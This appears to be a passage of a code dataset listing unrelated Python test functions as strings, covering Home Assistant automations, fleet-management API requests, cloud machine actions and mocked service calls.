\"entity_id\": entry.id,\n \"type\": \"open\",\n },\n },\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_close\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": \"close\",\n },\n },\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_stop\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": \"stop\",\n },\n },\n ]\n },\n )\n await hass.async_block_till_done()\n\n open_calls = async_mock_service(hass, \"cover\", \"open_cover\")\n close_calls = async_mock_service(hass, \"cover\", \"close_cover\")\n stop_calls = async_mock_service(hass, \"cover\", \"stop_cover\")\n\n hass.bus.async_fire(\"test_event_open\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 0\n assert len(stop_calls) == 0\n\n hass.bus.async_fire(\"test_event_close\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 1\n assert len(stop_calls) == 0\n\n hass.bus.async_fire(\"test_event_stop\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 1\n assert len(stop_calls) == 1\n\n assert open_calls[0].domain == DOMAIN\n assert open_calls[0].service == \"open_cover\"\n assert open_calls[0].data == {\"entity_id\": entry.entity_id}\n assert close_calls[0].domain == DOMAIN\n assert close_calls[0].service == \"close_cover\"\n assert close_calls[0].data == {\"entity_id\": entry.entity_id}\n assert stop_calls[0].domain == DOMAIN\n assert stop_calls[0].service == \"stop_cover\"\n assert stop_calls[0].data == {\"entity_id\": entry.entity_id}", "def test_API(self):\n print(\"Test API ...\")\n t0 = 
time.time()\n c = 0\n for trip_headsign in TRIP_HEADSIGN:\n for stop in STOP_A:\n payload = {'format': 'json', 'route_id': \"A\", 'trip_headsign': trip_headsign, 'stop_name': stop}\n req = requests.get('https://applications002.brest-metropole.fr/WIPOD01/Transport/REST/getRemainingTimes',params=payload)\n if len(req.text) < 100 : #API answer 189 characters if it works well\n print(\"API not responding for parameters : {}, {} \".format(trip_headsign, stop))\n c += 1\n else :\n print(\"Params : {}, {} : {}\".format(trip_headsign, stop, req.text))\n duration = time.time() - t0\n print(\"END OF TEST : duration : {} s, {} requests failed\".format(duration, c))", "async def test_list_fleet(client):\n group_param = {}\n params = [('access_token', 'access_token_example'),\n ('starting_after', 'starting_after_example'),\n ('ending_before', 'ending_before_example'),\n ('limit', 56)]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/list',\n headers=headers,\n json=group_param,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_start_machine(self, pretty_print, owner_api_token):\n machine = setup_data.get('start_machine', {}).get('machine') \\\n or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + \\\n '/api/v2/machines/{machine}/actions/start'.format(machine=machine)\n request = MistRequests(\n api_token=owner_api_token,\n uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'start_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(\n api_token=owner_api_token,\n uri=setup_data['amazon_machine_uri'],\n data={'state': 'running', 'actions': {'stop': True}},\n timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')", "def test_gwservice_updatedevice(self, setup_controller):\n configuration = {'uuid': '1'}\n payload = {'serialNumber': 'DEADBEEF0011',\n 'UUID': '123456',\n 'configuration': configuration,\n 'deviceType': 'AP',\n 'location': '',\n 'macAddress': 'DE:AD:BE:EF:00:11',\n 'manufacturer': 'Testing',\n 'owner': ''}\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"POST\", None, json.dumps(payload))\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw create devices\", body=body)\n if resp.status_code != 200:\n assert False\n devices = json.loads(resp.text)\n print (devices)\n\n payload = {'serialNumber': 'DEADBEEF0011',\n 'owner': 'pytest'}\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"PUT\", None, json.dumps(payload))\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw get device\", body=body)\n if resp.status_code != 200:\n assert False\n\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"GET\", None, None)\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw create device verify\", body=body)\n if resp.status_code != 200:\n assert False\n\n device = json.loads(resp.text)\n print (device)\n\n\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"DELETE\", None, None)\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw get device\", body=body)\n if resp.status_code != 200:\n assert False\n\n @pytest.mark.sdk_restapi\n def 
test_gwservice_deletedevice(self, setup_controller):\n \"\"\"\n Test the delete device endpoint\n WIFI-3455\n \"\"\"\n configuration = {'uuid': '1'}\n payload = {'serialNumber': 'DEADBEEF0011',\n 'UUID': '123456',\n 'configuration': configuration,\n 'deviceType': 'AP',\n 'location': '',\n 'macAddress': 'DE:AD:BE:EF:00:11',\n 'manufacturer': 'Testing',\n 'owner': ''}\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"POST\", None, json.dumps(payload))\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw create devices\", body=body)\n if resp.status_code != 200:\n assert False\n devices = json.loads(resp.text)\n print (devices)\n\n\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"DELETE\", None, None)\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw get device\", body=body)\n if resp.status_code != 200:\n assert False", "def test_create_startliste(http_service: Any) -> None:\n url = f\"{http_service}/start\"\n with open(\"tests/files/G11KvartStart.json\") as json_file:\n data = json.load(json_file)\n\n headers = {\"content-type\": \"application/json; charset=utf-8\"}\n response = requests.post(url, headers=headers, json=data)\n assert response.status_code == 201", "def test_run_started(self):", "def testApi(self):", "async def test_service_calls(oppio_env, opp, aioclient_mock):\n assert await async_setup_component(opp, \"oppio\", {})\n\n aioclient_mock.post(\"http://127.0.0.1/addons/test/start\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/stop\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/restart\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/update\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/stdin\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/host/shutdown\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/host/reboot\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/snapshots/new/full\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/snapshots/new/partial\", json={\"result\": \"ok\"})\n aioclient_mock.post(\n \"http://127.0.0.1/snapshots/test/restore/full\", json={\"result\": \"ok\"}\n )\n aioclient_mock.post(\n \"http://127.0.0.1/snapshots/test/restore/partial\", json={\"result\": \"ok\"}\n )\n\n await opp.services.async_call(\"oppio\", \"addon_start\", {\"addon\": \"test\"})\n await opp.services.async_call(\"oppio\", \"addon_stop\", {\"addon\": \"test\"})\n await opp.services.async_call(\"oppio\", \"addon_restart\", {\"addon\": \"test\"})\n await opp.services.async_call(\"oppio\", \"addon_update\", {\"addon\": \"test\"})\n await opp.services.async_call(\n \"oppio\", \"addon_stdin\", {\"addon\": \"test\", \"input\": \"test\"}\n )\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 8\n assert aioclient_mock.mock_calls[-1][2] == \"test\"\n\n await opp.services.async_call(\"oppio\", \"host_shutdown\", {})\n await opp.services.async_call(\"oppio\", \"host_reboot\", {})\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 10\n\n await opp.services.async_call(\"oppio\", \"snapshot_full\", {})\n await opp.services.async_call(\n \"oppio\",\n \"snapshot_partial\",\n {\"addons\": [\"test\"], \"folders\": [\"ssl\"], \"password\": \"123456\"},\n )\n await opp.async_block_till_done()\n\n assert 
aioclient_mock.call_count == 12\n assert aioclient_mock.mock_calls[-1][2] == {\n \"addons\": [\"test\"],\n \"folders\": [\"ssl\"],\n \"password\": \"123456\",\n }\n\n await opp.services.async_call(\"oppio\", \"restore_full\", {\"snapshot\": \"test\"})\n await opp.services.async_call(\n \"oppio\",\n \"restore_partial\",\n {\n \"snapshot\": \"test\",\n \"openpeerpower\": False,\n \"addons\": [\"test\"],\n \"folders\": [\"ssl\"],\n \"password\": \"123456\",\n },\n )\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 14\n assert aioclient_mock.mock_calls[-1][2] == {\n \"addons\": [\"test\"],\n \"folders\": [\"ssl\"],\n \"openpeerpower\": False,\n \"password\": \"123456\",\n }", "async def test_api_call_service_with_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\n\n Also test if our data came through.\n \"\"\"\n hass.states.async_set(\n \"test.data\",\n \"on\",\n {\"data\": service_call.data[\"test\"]},\n context=service_call.context,\n )\n\n hass.services.async_register(\"test_domain\", \"test_service\", listener)\n\n resp = await mock_api_client.post(\n \"/api/services/test_domain/test_service\", json={\"test\": 1}\n )\n data = await resp.json()\n assert len(data) == 1\n state = data[0]\n assert state[\"entity_id\"] == \"test.data\"\n assert state[\"state\"] == \"on\"\n assert state[\"attributes\"] == {\"data\": 1}", "def test_start(self):\n\n message = {\"method\": \"start\",\n \"params\": {\"elem\": self.container_to_run}}\n response = yield self._get_response(message)\n\n self.assertIsInstance(response, dict)\n self.assertEqual(response[\"method\"], \"start\")\n self.assertIsInstance(response[\"result\"], list)\n\n container_name = \"/\" + self.container_to_run\n\n containers = {i[0]: i[1] for i in response[\"result\"]}\n self.assertIn(container_name, containers.keys(),\n \"Container not found\")\n\n find_up_status = containers[container_name].lower().find(\"up\")\n\n self.assertEqual(find_up_status, 0, \"Container is not running\")", "def setUp(self):\n super(TestSyncServiceControl, self).setUp()\n self.api = ExternalApiClient()", "def test_call(self):\n\n with Client('username', 'password') as client:\n self.setSessionResponse(content='{\"ok\": true}')\n data = client.call(**self.build_parameters)\n self.assertEqual(data, '{\"ok\": true}')", "async def test_create_dispatch_route(client):\n create_dispatch_route_params = null\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/dispatch/routes',\n headers=headers,\n json=create_dispatch_route_params,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_fetch_all_dispatch_routes(client):\n params = [('access_token', 'access_token_example'),\n ('group_id', 56),\n ('end_time', 56),\n ('duration', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/dispatch/routes',\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_multiple_segments(self):\n socket = Mock()\n data = service_call.encode_call('bar', [10])\n socket.recv = Mock()\n socket.recv.side_effect = [data[:3], data[3:]]\n\n 
service_call.handle_connection(self.handlers, socket)\n self.handlers['bar'].assert_any_call([10])", "def test_data_framing(self):\n self.start_all_services()\n deproxy_cl = self.get_client(\"deproxy\")\n deproxy_cl.parsing = False\n request_body = \"x\" * 100\n\n deproxy_cl.make_request(request=self.post_request, end_stream=False)\n for byte in request_body[:-1]:\n deproxy_cl.make_request(request=byte, end_stream=False)\n deproxy_cl.make_request(request=request_body[-1], end_stream=True)\n\n self.__assert_test(client=deproxy_cl, request_body=request_body, request_number=1)", "async def test_get_fleet_locations(client):\n group_param = {}\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/locations',\n headers=headers,\n json=group_param,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def setUp(self):\n self.client = APIClient()\n\n self.speciality = models.Speciality.objects.create(\n name='Speciality'\n )\n\n self.payload = {\n 'name': \"Knee Replacement\",\n 'speciality': [self.speciality.pk],\n 'days_in_hospital': 2,\n 'days_in_destination': 2,\n 'duration_minutes': 120,\n 'overview': '<strong>Bla</strong> bla bla',\n }", "async def test_get_vehicles_locations(client):\n params = [('access_token', 'access_token_example'),\n ('start_ms', 56),\n ('end_ms', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/vehicles/locations',\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def startTestRun(self):", "async def test_get_dvirs(client):\n params = [('access_token', 'access_token_example'),\n ('end_ms', 56),\n ('duration_ms', 56),\n ('group_id', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/maintenance/dvirs',\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_api_predictor_events_get(self):\n pass", "def test_restart(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call\n self.assertTrue(rpc.restart())\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call()],\n self.supervisor.supvisors.fsm.on_restart.call_args_list)", "def test_post(self):\n self.client.force_login(self.john)\n\n with self.subTest(\"Test start task success\"):\n resp = self.client.post(self.URL, data={'taskType': 1})\n\n self.assertEqual(\n resp.status_code,\n status.HTTP_201_CREATED,\n \"Gamer cant create the task via API!\"\n )\n\n with self.subTest(\"Start the same task again fail\"):\n resp = self.client.post(self.URL, data={'taskType': 1})\n\n self.assertEqual(\n resp.status_code,\n status.HTTP_409_CONFLICT\n )", "def test_services(self):\n\n # Test turn_on\n turn_on_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_TURN_ON)\n\n remote.turn_on(\n self.hass,\n entity_id='entity_id_val')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(turn_on_calls))\n call = turn_on_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n\n # Test turn_off\n turn_off_calls = mock_service(\n self.hass, remote.DOMAIN, 
SERVICE_TURN_OFF)\n\n remote.turn_off(\n self.hass, entity_id='entity_id_val')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(turn_off_calls))\n call = turn_off_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n self.assertEqual(SERVICE_TURN_OFF, call.service)\n self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])\n\n # Test sync\n sync_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_SYNC)\n\n remote.sync(\n self.hass, entity_id='entity_id_val')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(sync_calls))\n call = sync_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n self.assertEqual(SERVICE_SYNC, call.service)\n self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])\n\n # Test send_command\n send_command_calls = mock_service(\n self.hass, remote.DOMAIN, SERVICE_SEND_COMMAND)\n\n remote.send_command(\n self.hass, entity_id='entity_id_val',\n device='test_device', command='test_command')\n\n self.hass.block_till_done()\n\n self.assertEqual(1, len(send_command_calls))\n call = send_command_calls[-1]\n\n self.assertEqual(remote.DOMAIN, call.domain)\n self.assertEqual(SERVICE_SEND_COMMAND, call.service)\n self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])", "def program_start_stop_response_fixture() -> dict[str, Any]:\n return cast(\n dict[str, Any], json.loads(load_fixture(\"program_start_stop_response.json\"))\n )", "def start():\n\n config = os.path.join(tempfile.gettempdir(), \"testapi.yml\")\n\n with open(config, \"w\", encoding=\"utf-8\") as output:\n output.write(WORKFLOWS)\n\n client = TestClient(app)\n start()\n\n return client", "async def test_get_dispatch_route_history(client):\n params = [('access_token', 'access_token_example'),\n ('start_time', 56),\n ('end_time', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/dispatch/routes/{route_id}/history'.format(route_id=56),\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_create_machine(self, pretty_print, owner_api_token):\n create_machine_request = setup_data.get('create_machine', {}).get(\n 'request_body') or json.loads(\"\"\"{\n \"template\" : \"{}\",\n \"image\" : \"Debian\",\n \"quantity\" : 1.4658129805029452,\n \"disks\" : {\n \"disk_size\" : 0,\n \"disk_path\" : \"disk_path\"\n },\n \"fqdn\" : \"fqdn\",\n \"cloudinit\" : \"cloudinit\",\n \"volumes\" : \"\",\n \"save\" : true,\n \"dry\" : true,\n \"monitoring\" : true,\n \"tags\" : \"{}\",\n \"cloud\" : \"cloud\",\n \"size\" : \"m1.small\",\n \"optimize\" : \"optimize\",\n \"schedules\" : [ \"\", \"\" ],\n \"extra\" : \"\",\n \"name\" : \"DB mirror\",\n \"location\" : \"\",\n \"expiration\" : {\n \"date\" : \"2000-01-23T04:56:07.000+00:00\",\n \"action\" : \"stop\",\n \"notify\" : {\n \"period\" : \"minutes\",\n \"value\" : 1\n },\n \"notify_msg\" : \"notify_msg\"\n },\n \"net\" : \"\",\n \"scripts\" : [ \"\", \"\" ],\n \"key\" : \"\"\n}\"\"\", strict=False)\n uri = MIST_URL + '/api/v2/machines'\n request = MistRequests(\n api_token=owner_api_token,\n uri=uri,\n json=create_machine_request)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'create_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(\n api_token=owner_api_token,\n uri=setup_data['amazon_machine_uri'],\n data={'state': 'running', 'actions': {'reboot': 
True}},\n timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')", "async def test_get_vehicle_locations(client):\n params = [('access_token', 'access_token_example'),\n ('start_ms', 56),\n ('end_ms', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/vehicles/{vehicle_id}/locations'.format(vehicle_id=56),\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_issue_start_stop_watch(self):\n pass", "def test_micro_service():\n data_list = [\"1\", \"2\", \"3\"]\n service_list = []\n for d in data_list:\n service = MicroService()\n service.process = create_process_func(d)\n service_list.append(service)\n\n service_queue = build_micro_service_queue(service_list)\n test_data = \"test_data\"\n context = Context()\n context.state = State()\n data = service_queue.process_service_queue(context, test_data)\n\n for d in data_list:\n test_data = \"{}{}\".format(test_data, d)\n\n assert data == test_data", "def test_service_initiated():\n assert \"ready\" in bkt_outcome_unwind.index()", "def test_normal_operation(self, mocker):\n api = mocker.Mock(spec=TelemetryAPI)\n api.record_unique_keys.return_value = HttpResponse(200, '')\n\n unique_keys_tracker = UniqueKeysTracker()\n unique_keys_tracker.track(\"key1\", \"split1\")\n unique_keys_tracker.track(\"key2\", \"split1\")\n\n unique_keys_sync = UniqueKeysSynchronizer(mocker.Mock(), unique_keys_tracker)\n task = UniqueKeysSyncTask(unique_keys_sync.send_all, 1)\n task.start()\n time.sleep(2)\n assert task.is_running()\n assert api.record_unique_keys.mock_calls == mocker.call()\n stop_event = threading.Event()\n task.stop(stop_event)\n stop_event.wait(5)\n assert stop_event.is_set()", "async def test_get_fleet_trips(client):\n trips_param = {}\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/trips',\n headers=headers,\n json=trips_param,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def setUp(self):\n self.staff = get_user_model().objects.create_user(\n email='[email protected]',\n password='staffpassword1234',\n username='staffusername'\n )\n self.staff.is_staff = True\n self.staff.save()\n self.staff.refresh_from_db()\n\n self.client = APIClient()\n self.client.force_authenticate(user=self.staff)\n\n self.speciality = models.Speciality.objects.create(\n name='Speciality'\n )\n\n self.payload = {\n 'name': \"Knee Replacement\",\n 'speciality': [self.speciality.id],\n 'overview': '<strong>Bla</strong> bla bla',\n }\n\n \"\"\"Test that list procedure is success\"\"\"\n p1 = models.Procedure.objects.create(\n name=\"procedure1\",\n overview='bla bla bla'\n )\n p1.speciality.set([self.speciality.pk])\n p1.save()\n\n p2 = models.Procedure.objects.create(\n name=\"procedure2\",\n overview='bla bla bla'\n )\n p2.speciality.set([self.speciality.pk])\n p2.save()\n\n res = self.client.get(PROCEDURE_URL)\n\n procedures = models.Procedure.objects.all().order_by(\"-name\")\n ser = serializer.ProcedureSerializer(procedures, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 2)\n self.assertEqual(res.data, ser.data)", "async def test_action_tilt(\n hass: HomeAssistant,\n entity_registry: er.EntityRegistry,\n 
enable_custom_integrations: None,\n) -> None:\n entry = entity_registry.async_get_or_create(DOMAIN, \"test\", \"5678\")\n\n assert await async_setup_component(\n hass,\n automation.DOMAIN,\n {\n automation.DOMAIN: [\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_open\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": \"open_tilt\",\n },\n },\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_close\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": \"close_tilt\",\n },\n },\n ]\n },\n )\n await hass.async_block_till_done()\n\n open_calls = async_mock_service(hass, \"cover\", \"open_cover_tilt\")\n close_calls = async_mock_service(hass, \"cover\", \"close_cover_tilt\")\n\n hass.bus.async_fire(\"test_event_open\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 0\n\n hass.bus.async_fire(\"test_event_close\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 1\n\n hass.bus.async_fire(\"test_event_stop\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 1\n\n assert open_calls[0].domain == DOMAIN\n assert open_calls[0].service == \"open_cover_tilt\"\n assert open_calls[0].data == {\"entity_id\": entry.entity_id}\n assert close_calls[0].domain == DOMAIN\n assert close_calls[0].service == \"close_cover_tilt\"\n assert close_calls[0].data == {\"entity_id\": entry.entity_id}", "def test_get_requests(self):\n response = self.client.open('/api/provisioning/port',\n method='GET')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def test_start_services(matrix, mock_host_service):\n mock_host_service.reset_mock()\n status = matrix.start_services()\n mock_host_service.assert_has_calls(\n [\n mock.call(\"start\", matrix.synapse_service),\n mock.call(\"enable\", matrix.synapse_service),\n ],\n any_order=False,\n )\n assert mock_host_service.call_count == 2\n assert status is True", "def test_get_next_to_arrive(self, mock_requests):\n\n r = services.get_next_to_arrive(self.a, self.b)\n params = {'req1': self.a, 'req2': self.b}\n\n self.assertTrue(\n mock.call.get(services.SEPTA_NEXTTOARRIVE_URL, params=params) in\n mock_requests.mock_calls)", "def test_call(self):\n with HTTMock(spark_cloud_mock):\n for f in self.device.functions:\n expected = self.cloud_device.call(f, 'args')\n self.assertEqual(self.device.call(f, 'args'), expected)", "def test_done_post(self):\n Parameters = Parameters2()\n response = self.client.open(\n '/done',\n method='POST',\n data=json.dumps(Parameters),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_status_post(self):\n Parameters = Parameters1()\n response = self.client.open(\n '/status',\n method='POST',\n data=json.dumps(Parameters),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "async def test_get_automation_trace(hass, hass_ws_client):\n id = 1\n\n def next_id():\n nonlocal id\n id += 1\n return id\n\n sun_config = {\n \"id\": \"sun\",\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event\"},\n \"action\": {\"service\": \"test.automation\"},\n }\n moon_config = {\n \"id\": \"moon\",\n \"trigger\": [\n {\"platform\": \"event\", \"event_type\": 
\"test_event2\"},\n {\"platform\": \"event\", \"event_type\": \"test_event3\"},\n ],\n \"condition\": {\n \"condition\": \"template\",\n \"value_template\": \"{{ trigger.event.event_type=='test_event2' }}\",\n },\n \"action\": {\"event\": \"another_event\"},\n }\n\n assert await async_setup_component(\n hass,\n \"automation\",\n {\n \"automation\": [\n sun_config,\n moon_config,\n ]\n },\n )\n\n with patch.object(config, \"SECTIONS\", [\"automation\"]):\n await async_setup_component(hass, \"config\", {})\n\n client = await hass_ws_client()\n\n await client.send_json({\"id\": next_id(), \"type\": \"automation/trace\"})\n response = await client.receive_json()\n assert response[\"success\"]\n assert response[\"result\"] == {}\n\n await client.send_json(\n {\"id\": next_id(), \"type\": \"automation/trace\", \"automation_id\": \"sun\"}\n )\n response = await client.receive_json()\n assert response[\"success\"]\n assert response[\"result\"] == {\"sun\": []}\n\n # Trigger \"sun\" automation\n hass.bus.async_fire(\"test_event\")\n await hass.async_block_till_done()\n\n # Get trace\n await client.send_json({\"id\": next_id(), \"type\": \"automation/trace\"})\n response = await client.receive_json()\n assert response[\"success\"]\n assert \"moon\" not in response[\"result\"]\n assert len(response[\"result\"][\"sun\"]) == 1\n trace = response[\"result\"][\"sun\"][0]\n assert len(trace[\"action_trace\"]) == 1\n assert len(trace[\"action_trace\"][\"action/0\"]) == 1\n assert trace[\"action_trace\"][\"action/0\"][0][\"error\"]\n assert \"result\" not in trace[\"action_trace\"][\"action/0\"][0]\n assert trace[\"condition_trace\"] == {}\n assert trace[\"config\"] == sun_config\n assert trace[\"context\"]\n assert trace[\"error\"] == \"Unable to find service test.automation\"\n assert trace[\"state\"] == \"stopped\"\n assert trace[\"trigger\"][\"description\"] == \"event 'test_event'\"\n assert trace[\"unique_id\"] == \"sun\"\n assert trace[\"variables\"]\n\n # Trigger \"moon\" automation, with passing condition\n hass.bus.async_fire(\"test_event2\")\n await hass.async_block_till_done()\n\n # Get trace\n await client.send_json(\n {\"id\": next_id(), \"type\": \"automation/trace\", \"automation_id\": \"moon\"}\n )\n response = await client.receive_json()\n assert response[\"success\"]\n assert \"sun\" not in response[\"result\"]\n assert len(response[\"result\"][\"moon\"]) == 1\n trace = response[\"result\"][\"moon\"][0]\n assert len(trace[\"action_trace\"]) == 1\n assert len(trace[\"action_trace\"][\"action/0\"]) == 1\n assert \"error\" not in trace[\"action_trace\"][\"action/0\"][0]\n assert \"result\" not in trace[\"action_trace\"][\"action/0\"][0]\n assert len(trace[\"condition_trace\"]) == 1\n assert len(trace[\"condition_trace\"][\"condition/0\"]) == 1\n assert trace[\"condition_trace\"][\"condition/0\"][0][\"result\"] == {\"result\": True}\n assert trace[\"config\"] == moon_config\n assert trace[\"context\"]\n assert \"error\" not in trace\n assert trace[\"state\"] == \"stopped\"\n assert trace[\"trigger\"][\"description\"] == \"event 'test_event2'\"\n assert trace[\"unique_id\"] == \"moon\"\n assert trace[\"variables\"]\n\n # Trigger \"moon\" automation, with failing condition\n hass.bus.async_fire(\"test_event3\")\n await hass.async_block_till_done()\n\n # Get trace\n await client.send_json(\n {\"id\": next_id(), \"type\": \"automation/trace\", \"automation_id\": \"moon\"}\n )\n response = await client.receive_json()\n assert response[\"success\"]\n assert \"sun\" not in response[\"result\"]\n 
assert len(response[\"result\"][\"moon\"]) == 2\n trace = response[\"result\"][\"moon\"][1]\n assert len(trace[\"action_trace\"]) == 0\n assert len(trace[\"condition_trace\"]) == 1\n assert len(trace[\"condition_trace\"][\"condition/0\"]) == 1\n assert trace[\"condition_trace\"][\"condition/0\"][0][\"result\"] == {\"result\": False}\n assert trace[\"config\"] == moon_config\n assert trace[\"context\"]\n assert \"error\" not in trace\n assert trace[\"state\"] == \"stopped\"\n assert trace[\"trigger\"][\"description\"] == \"event 'test_event3'\"\n assert trace[\"unique_id\"] == \"moon\"\n assert trace[\"variables\"]\n\n # Trigger \"moon\" automation, with passing condition\n hass.bus.async_fire(\"test_event2\")\n await hass.async_block_till_done()\n\n # Get trace\n await client.send_json(\n {\"id\": next_id(), \"type\": \"automation/trace\", \"automation_id\": \"moon\"}\n )\n response = await client.receive_json()\n assert response[\"success\"]\n assert \"sun\" not in response[\"result\"]\n assert len(response[\"result\"][\"moon\"]) == 3\n trace = response[\"result\"][\"moon\"][2]\n assert len(trace[\"action_trace\"]) == 1\n assert len(trace[\"action_trace\"][\"action/0\"]) == 1\n assert \"error\" not in trace[\"action_trace\"][\"action/0\"][0]\n assert \"result\" not in trace[\"action_trace\"][\"action/0\"][0]\n assert len(trace[\"condition_trace\"]) == 1\n assert len(trace[\"condition_trace\"][\"condition/0\"]) == 1\n assert trace[\"condition_trace\"][\"condition/0\"][0][\"result\"] == {\"result\": True}\n assert trace[\"config\"] == moon_config\n assert trace[\"context\"]\n assert \"error\" not in trace\n assert trace[\"state\"] == \"stopped\"\n assert trace[\"trigger\"][\"description\"] == \"event 'test_event2'\"\n assert trace[\"unique_id\"] == \"moon\"\n assert trace[\"variables\"]", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n 